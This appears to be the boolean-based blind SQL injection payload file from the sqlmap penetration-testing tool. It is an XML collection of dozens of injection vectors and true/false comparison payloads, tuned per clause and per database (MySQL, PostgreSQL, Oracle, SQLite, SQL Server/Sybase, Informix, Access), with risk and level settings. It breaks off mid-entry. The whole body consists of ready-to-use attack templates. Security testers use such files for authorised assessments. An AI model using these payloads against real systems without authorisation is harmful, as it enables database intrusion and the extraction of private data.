Path: blob/master/data/xml/payloads/boolean_blind.xml
2992 views
<?xml version="1.0" encoding="UTF-8"?>12<!--3Tag: <test>4SQL injection test definition.56Sub-tag: <title>7Title of the test.89Sub-tag: <stype>10SQL injection family type.1112Valid values:131: Boolean-based blind SQL injection142: Error-based queries SQL injection153: Inline queries SQL injection164: Stacked queries SQL injection175: Time-based blind SQL injection186: UNION query SQL injection1920Sub-tag: <level>21From which level check for this test.2223Valid values:241: Always (<100 requests)252: Try a bit harder (100-200 requests)263: Good number of requests (200-500 requests)274: Extensive test (500-1000 requests)285: You have plenty of time (>1000 requests)2930Sub-tag: <risk>31Likelihood of a payload to damage the data integrity.3233Valid values:341: Low risk352: Medium risk363: High risk3738Sub-tag: <clause>39In which clause the payload can work.4041NOTE: for instance, there are some payload that do not have to be42tested as soon as it has been identified whether or not the43injection is within a WHERE clause condition.4445Valid values:460: Always471: WHERE / HAVING482: GROUP BY493: ORDER BY504: LIMIT515: OFFSET526: TOP537: Table name548: Column name559: Pre-WHERE (non-query)5657A comma separated list of these values is also possible.5859Sub-tag: <where>60Where to add our '<prefix> <payload><comment> <suffix>' string.6162Valid values:631: Append the string to the parameter original value642: Replace the parameter original value with a negative random65integer value and append our string663: Replace the parameter original value with our string6768Sub-tag: <vector>69The payload that will be used to exploit the injection point.7071Sub-tag: <request>72What to inject for this test.7374Sub-tag: <payload>75The payload to test for.7677Sub-tag: <comment>78Comment to append to the payload, before the suffix.7980Sub-tag: <char>81Character to use to bruteforce number of columns in UNION82query SQL injection tests.8384Sub-tag: <columns>85Range of columns to test for in UNION query SQL injection86tests.8788Sub-tag: <response>89How to identify if the injected payload succeeded.9091Sub-tag: <comparison>92Perform a request with this string as the payload and compare93the response with the <payload> response. Apply the comparison94algorithm.9596NOTE: useful to test for boolean-based blind SQL injections.9798Sub-tag: <grep>99Regular expression to grep for in the response body.100101NOTE: useful to test for error-based SQL injection.102103Sub-tag: <time>104Time in seconds to wait before the response is returned.105106NOTE: useful to test for time-based blind and stacked queries107SQL injections.108109Sub-tag: <union>110Calls unionTest() function.111112NOTE: useful to test for UNION query (inband) SQL injection.113114Sub-tag: <details>115Which details can be infered if the payload succeed.116117Sub-tags: <dbms>118What is the database management system (e.g. MySQL).119120Sub-tags: <dbms_version>121What is the database management system version (e.g. 5.0.51).122123Sub-tags: <os>124What is the database management system underlying operating125system.126127<test>128<title></title>129<stype></stype>130<level></level>131<risk></risk>132<clause></clause>133<where></where>134<vector></vector>135<request>136<payload></payload>137<comment></comment>138<char></char>139<columns></columns>140</request>141<response>142<comparison></comparison>143<grep></grep>144<time></time>145<union></union>146</response>147<details>148<dbms></dbms>149<dbms_version></dbms_version>150<os></os>151</details>152</test>153-->154155<root>156<!-- Boolean-based blind tests - WHERE/HAVING clause -->157<test>158<title>AND boolean-based blind - WHERE or HAVING clause</title>159<stype>1</stype>160<level>1</level>161<risk>1</risk>162<clause>1,8,9</clause>163<where>1</where>164<vector>AND [INFERENCE]</vector>165<request>166<payload>AND [RANDNUM]=[RANDNUM]</payload>167</request>168<response>169<comparison>AND [RANDNUM]=[RANDNUM1]</comparison>170</response>171</test>172173<test>174<title>OR boolean-based blind - WHERE or HAVING clause</title>175<stype>1</stype>176<level>1</level>177<risk>3</risk>178<clause>1,9</clause>179<where>2</where>180<vector>OR [INFERENCE]</vector>181<request>182<payload>OR [RANDNUM]=[RANDNUM]</payload>183</request>184<response>185<comparison>OR [RANDNUM]=[RANDNUM1]</comparison>186</response>187</test>188189<test>190<title>OR boolean-based blind - WHERE or HAVING clause (NOT)</title>191<stype>1</stype>192<level>3</level>193<risk>3</risk>194<clause>1,9</clause>195<where>1</where>196<vector>OR NOT [INFERENCE]</vector>197<request>198<payload>OR NOT [RANDNUM]=[RANDNUM]</payload>199</request>200<response>201<comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>202</response>203</test>204205<test>206<title>AND boolean-based blind - WHERE or HAVING clause (subquery - comment)</title>207<stype>1</stype>208<level>2</level>209<risk>1</risk>210<clause>1,8,9</clause>211<where>1</where>212<vector>AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</vector>213<request>214<payload>AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</payload>215<comment>[GENERIC_SQL_COMMENT]</comment>216</request>217<response>218<comparison>AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</comparison>219</response>220</test>221222<test>223<title>OR boolean-based blind - WHERE or HAVING clause (subquery - comment)</title>224<stype>1</stype>225<level>2</level>226<risk>3</risk>227<clause>1,9</clause>228<where>2</where>229<vector>OR [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</vector>230<request>231<payload>OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</payload>232<comment>[GENERIC_SQL_COMMENT]</comment>233</request>234<response>235<comparison>OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</comparison>236</response>237</test>238239<test>240<title>AND boolean-based blind - WHERE or HAVING clause (comment)</title>241<stype>1</stype>242<level>2</level>243<risk>1</risk>244<clause>1</clause>245<where>1</where>246<vector>AND [INFERENCE]</vector>247<request>248<payload>AND [RANDNUM]=[RANDNUM]</payload>249<comment>[GENERIC_SQL_COMMENT]</comment>250</request>251<response>252<comparison>AND [RANDNUM]=[RANDNUM1]</comparison>253</response>254</test>255256<test>257<title>OR boolean-based blind - WHERE or HAVING clause (comment)</title>258<stype>1</stype>259<level>2</level>260<risk>3</risk>261<clause>1</clause>262<where>2</where>263<vector>OR [INFERENCE]</vector>264<request>265<payload>OR [RANDNUM]=[RANDNUM]</payload>266<comment>[GENERIC_SQL_COMMENT]</comment>267</request>268<response>269<comparison>OR [RANDNUM]=[RANDNUM1]</comparison>270</response>271</test>272273<test>274<title>OR boolean-based blind - WHERE or HAVING clause (NOT - comment)</title>275<stype>1</stype>276<level>4</level>277<risk>3</risk>278<clause>1</clause>279<where>1</where>280<vector>OR NOT [INFERENCE]</vector>281<request>282<payload>OR NOT [RANDNUM]=[RANDNUM]</payload>283<comment>[GENERIC_SQL_COMMENT]</comment>284</request>285<response>286<comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>287</response>288</test>289290<test>291<title>AND boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>292<stype>1</stype>293<level>3</level>294<risk>1</risk>295<clause>1</clause>296<where>1</where>297<vector>AND [INFERENCE]</vector>298<request>299<payload>AND [RANDNUM]=[RANDNUM]</payload>300<comment>#</comment>301</request>302<response>303<comparison>AND [RANDNUM]=[RANDNUM1]</comparison>304</response>305<details>306<dbms>MySQL</dbms>307</details>308</test>309310<test>311<title>OR boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>312<stype>1</stype>313<level>3</level>314<risk>3</risk>315<clause>1</clause>316<where>2</where>317<vector>OR [INFERENCE]</vector>318<request>319<payload>OR [RANDNUM]=[RANDNUM]</payload>320<comment>#</comment>321</request>322<response>323<comparison>OR [RANDNUM]=[RANDNUM1]</comparison>324</response>325<details>326<dbms>MySQL</dbms>327</details>328</test>329330<test>331<title>OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)</title>332<stype>1</stype>333<level>3</level>334<risk>3</risk>335<clause>1</clause>336<where>1</where>337<vector>OR NOT [INFERENCE]</vector>338<request>339<payload>OR NOT [RANDNUM]=[RANDNUM]</payload>340<comment>#</comment>341</request>342<response>343<comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>344</response>345<details>346<dbms>MySQL</dbms>347</details>348</test>349350<test>351<title>AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)</title>352<stype>1</stype>353<level>3</level>354<risk>1</risk>355<clause>1</clause>356<where>1</where>357<vector>AND [INFERENCE]</vector>358<request>359<payload>AND [RANDNUM]=[RANDNUM]</payload>360<comment>%16</comment>361</request>362<response>363<comparison>AND [RANDNUM]=[RANDNUM1]</comparison>364</response>365<details>366<dbms>Microsoft Access</dbms>367</details>368</test>369370<test>371<title>OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)</title>372<stype>1</stype>373<level>3</level>374<risk>3</risk>375<clause>1</clause>376<where>2</where>377<vector>OR [INFERENCE]</vector>378<request>379<payload>OR [RANDNUM]=[RANDNUM]</payload>380<comment>%16</comment>381</request>382<response>383<comparison>OR [RANDNUM]=[RANDNUM1]</comparison>384</response>385<details>386<dbms>Microsoft Access</dbms>387</details>388</test>389390<test>391<title>MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause</title>392<stype>1</stype>393<level>2</level>394<risk>1</risk>395<clause>1,2,3</clause>396<where>1</where>397<vector>RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))</vector>398<request>399<payload>RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END))</payload>400</request>401<response>402<comparison>RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END))</comparison>403</response>404<details>405<dbms>MySQL</dbms>406</details>407</test>408409<test>410<title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)</title>411<stype>1</stype>412<level>3</level>413<risk>1</risk>414<clause>1,2,3,8</clause>415<where>1</where>416<vector>AND MAKE_SET([INFERENCE],[RANDNUM])</vector>417<request>418<payload>AND MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>419</request>420<response>421<comparison>AND MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>422</response>423<details>424<dbms>MySQL</dbms>425</details>426</test>427428<test>429<title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)</title>430<stype>1</stype>431<level>3</level>432<risk>3</risk>433<clause>1,2,3</clause>434<where>2</where>435<vector>OR MAKE_SET([INFERENCE],[RANDNUM])</vector>436<request>437<payload>OR MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>438</request>439<response>440<comparison>OR MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>441</response>442<details>443<dbms>MySQL</dbms>444</details>445</test>446447<test>448<title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)</title>449<stype>1</stype>450<level>4</level>451<risk>1</risk>452<clause>1,2,3,8</clause>453<where>1</where>454<vector>AND ELT([INFERENCE],[RANDNUM])</vector>455<request>456<payload>AND ELT([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>457</request>458<response>459<comparison>AND ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>460</response>461<details>462<dbms>MySQL</dbms>463</details>464</test>465466<test>467<title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)</title>468<stype>1</stype>469<level>4</level>470<risk>3</risk>471<clause>1,2,3</clause>472<where>2</where>473<vector>OR ELT([INFERENCE],[RANDNUM])</vector>474<request>475<payload>OR ELT([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>476</request>477<response>478<comparison>OR ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>479</response>480<details>481<dbms>MySQL</dbms>482</details>483</test>484485<test>486<title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>487<stype>1</stype>488<level>5</level>489<risk>1</risk>490<clause>1,2,3,8</clause>491<where>1</where>492<vector>AND EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END)</vector>493<request>494<payload>AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END)</payload>495</request>496<response>497<comparison>AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)</comparison>498</response>499<details>500<dbms>MySQL</dbms>501</details>502</test>503504<test>505<title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>506<stype>1</stype>507<level>5</level>508<risk>3</risk>509<clause>1,2,3,8</clause>510<where>2</where>511<vector>OR EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END)</vector>512<request>513<payload>OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END)</payload>514</request>515<response>516<comparison>OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)</comparison>517</response>518<details>519<dbms>MySQL</dbms>520</details>521</test>522523<test>524<title>PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)</title>525<stype>1</stype>526<level>2</level>527<risk>1</risk>528<clause>1,8</clause>529<where>1</where>530<vector>AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</vector>531<request>532<payload>AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</payload>533</request>534<response>535<comparison>AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</comparison>536</response>537<details>538<dbms>PostgreSQL</dbms>539</details>540</test>541542<test>543<title>PostgreSQL OR boolean-based blind - WHERE or HAVING clause (CAST)</title>544<stype>1</stype>545<level>3</level>546<risk>3</risk>547<clause>1</clause>548<where>2</where>549<vector>OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</vector>550<request>551<payload>OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</payload>552</request>553<response>554<comparison>OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</comparison>555</response>556<details>557<dbms>PostgreSQL</dbms>558</details>559</test>560561<test>562<title>Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>563<stype>1</stype>564<level>2</level>565<risk>1</risk>566<clause>1</clause>567<where>1</where>568<vector>AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL</vector>569<request>570<payload>AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL</payload>571</request>572<response>573<comparison>AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL</comparison>574</response>575<details>576<dbms>Oracle</dbms>577</details>578</test>579580<test>581<title>Oracle OR boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>582<stype>1</stype>583<level>3</level>584<risk>3</risk>585<clause>1</clause>586<where>2</where>587<vector>OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL</vector>588<request>589<payload>OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL</payload>590</request>591<response>592<comparison>OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL</comparison>593</response>594<details>595<dbms>Oracle</dbms>596</details>597</test>598599<test>600<title>SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)</title>601<stype>1</stype>602<level>2</level>603<risk>1</risk>604<clause>1</clause>605<where>1</where>606<vector>AND CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</vector>607<request>608<payload>AND CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</payload>609</request>610<response>611<comparison>AND CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</comparison>612</response>613<details>614<dbms>SQLite</dbms>615</details>616</test>617618<test>619<title>SQLite OR boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)</title>620<stype>1</stype>621<level>3</level>622<risk>3</risk>623<clause>1</clause>624<where>2</where>625<vector>OR CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</vector>626<request>627<payload>OR CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</payload>628</request>629<response>630<comparison>OR CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</comparison>631</response>632<details>633<dbms>SQLite</dbms>634</details>635</test>636637<!-- End of boolean-based blind tests - WHERE or HAVING clause -->638639<!-- Boolean-based blind tests - Parameter replace -->640<test>641<title>Boolean-based blind - Parameter replace (original value)</title>642<stype>1</stype>643<level>1</level>644<risk>1</risk>645<clause>1,2,3</clause>646<where>3</where>647<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</vector>648<request>649<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</payload>650</request>651<response>652<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))</comparison>653</response>654</test>655656<test>657<title>MySQL boolean-based blind - Parameter replace (MAKE_SET)</title>658<stype>1</stype>659<level>4</level>660<risk>1</risk>661<clause>1,2,3</clause>662<where>3</where>663<vector>MAKE_SET([INFERENCE],[RANDNUM])</vector>664<request>665<payload>MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>666</request>667<response>668<comparison>MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>669</response>670<details>671<dbms>MySQL</dbms>672</details>673</test>674675<test>676<title>MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)</title>677<stype>1</stype>678<level>5</level>679<risk>1</risk>680<clause>1,2,3</clause>681<where>3</where>682<vector>MAKE_SET([INFERENCE],[ORIGVALUE])</vector>683<request>684<payload>MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE])</payload>685</request>686<response>687<comparison>MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])</comparison>688</response>689<details>690<dbms>MySQL</dbms>691</details>692</test>693694<test>695<title>MySQL boolean-based blind - Parameter replace (ELT)</title>696<stype>1</stype>697<level>4</level>698<risk>1</risk>699<clause>1,2,3</clause>700<where>3</where>701<vector>ELT([INFERENCE],[RANDNUM])</vector>702<request>703<payload>ELT([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>704</request>705<response>706<comparison>ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>707</response>708<details>709<dbms>MySQL</dbms>710</details>711</test>712713<test>714<title>MySQL boolean-based blind - Parameter replace (ELT - original value)</title>715<stype>1</stype>716<level>5</level>717<risk>1</risk>718<clause>1,2,3</clause>719<where>3</where>720<vector>ELT([INFERENCE],[ORIGVALUE])</vector>721<request>722<payload>ELT([RANDNUM]=[RANDNUM],[ORIGVALUE])</payload>723</request>724<response>725<comparison>ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE])</comparison>726</response>727<details>728<dbms>MySQL</dbms>729</details>730</test>731732<test>733<title>MySQL boolean-based blind - Parameter replace (bool*int)</title>734<stype>1</stype>735<level>4</level>736<risk>1</risk>737<clause>1,2,3</clause>738<where>3</where>739<vector>([INFERENCE])*[RANDNUM]</vector>740<request>741<payload>([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>742</request>743<response>744<comparison>([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>745</response>746<details>747<dbms>MySQL</dbms>748</details>749</test>750751<test>752<title>MySQL boolean-based blind - Parameter replace (bool*int - original value)</title>753<stype>1</stype>754<level>5</level>755<risk>1</risk>756<clause>1,2,3</clause>757<where>3</where>758<vector>([INFERENCE])*[ORIGVALUE]</vector>759<request>760<payload>([RANDNUM]=[RANDNUM])*[ORIGVALUE]</payload>761</request>762<response>763<comparison>([RANDNUM]=[RANDNUM1])*[ORIGVALUE]</comparison>764</response>765<details>766<dbms>MySQL</dbms>767</details>768</test>769770<test>771<title>PostgreSQL boolean-based blind - Parameter replace</title>772<stype>1</stype>773<level>3</level>774<risk>1</risk>775<clause>1,2,3</clause>776<where>3</where>777<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</vector>778<request>779<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</payload>780</request>781<response>782<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</comparison>783</response>784<details>785<dbms>PostgreSQL</dbms>786</details>787</test>788789<test>790<title>PostgreSQL boolean-based blind - Parameter replace (original value)</title>791<stype>1</stype>792<level>4</level>793<risk>1</risk>794<clause>1,2,3</clause>795<where>3</where>796<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>797<request>798<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>799</request>800<response>801<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</comparison>802</response>803<details>804<dbms>PostgreSQL</dbms>805</details>806</test>807808<!-- Because of the syntax of GENERATE_SERIES() function, the 'then' condition must be 1, do not change it -->809<test>810<title>PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES)</title>811<stype>1</stype>812<level>5</level>813<risk>1</risk>814<clause>1,2,3</clause>815<where>3</where>816<vector>(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>817<request>818<payload>(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>819</request>820<response>821<comparison>(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>822</response>823<details>824<dbms>PostgreSQL</dbms>825</details>826</test>827828<!-- Because of the syntax of GENERATE_SERIES() function, the 'then' condition must be 1, do not change it -->829<test>830<title>PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)</title>831<stype>1</stype>832<level>5</level>833<risk>1</risk>834<clause>1,2,3</clause>835<where>3</where>836<vector>(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>837<request>838<payload>(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>839</request>840<response>841<comparison>(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>842</response>843<details>844<dbms>PostgreSQL</dbms>845</details>846</test>847848<test>849<title>Microsoft SQL Server/Sybase boolean-based blind - Parameter replace</title>850<stype>1</stype>851<level>3</level>852<risk>1</risk>853<clause>1,3</clause>854<where>3</where>855<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</vector>856<request>857<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</payload>858</request>859<response>860<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</comparison>861</response>862<details>863<dbms>Microsoft SQL Server</dbms>864<dbms>Sybase</dbms>865</details>866</test>867868<test>869<title>Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)</title>870<stype>1</stype>871<level>4</level>872<risk>1</risk>873<clause>1,3</clause>874<where>3</where>875<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</vector>876<request>877<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</payload>878</request>879<response>880<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</comparison>881</response>882<details>883<dbms>Microsoft SQL Server</dbms>884<dbms>Sybase</dbms>885</details>886</test>887888<test>889<title>Oracle boolean-based blind - Parameter replace</title>890<stype>1</stype>891<level>3</level>892<risk>1</risk>893<clause>1,3</clause>894<where>3</where>895<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>896<request>897<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>898</request>899<response>900<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>901</response>902<details>903<dbms>Oracle</dbms>904</details>905</test>906907<test>908<title>Oracle boolean-based blind - Parameter replace (original value)</title>909<stype>1</stype>910<level>4</level>911<risk>1</risk>912<clause>1,3</clause>913<where>3</where>914<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>915<request>916<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>917</request>918<response>919<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>920</response>921<details>922<dbms>Oracle</dbms>923</details>924</test>925926<test>927<title>Informix boolean-based blind - Parameter replace</title>928<stype>1</stype>929<level>3</level>930<risk>1</risk>931<clause>1,3</clause>932<where>3</where>933<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</vector>934<request>935<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</payload>936</request>937<response>938<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</comparison>939</response>940<details>941<dbms>Informix</dbms>942</details>943</test>944945<test>946<title>Informix boolean-based blind - Parameter replace (original value)</title>947<stype>1</stype>948<level>4</level>949<risk>1</risk>950<clause>1,3</clause>951<where>3</where>952<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</vector>953<request>954<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</payload>955</request>956<response>957<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</comparison>958</response>959<details>960<dbms>Informix</dbms>961</details>962</test>963964<test>965<title>Microsoft Access 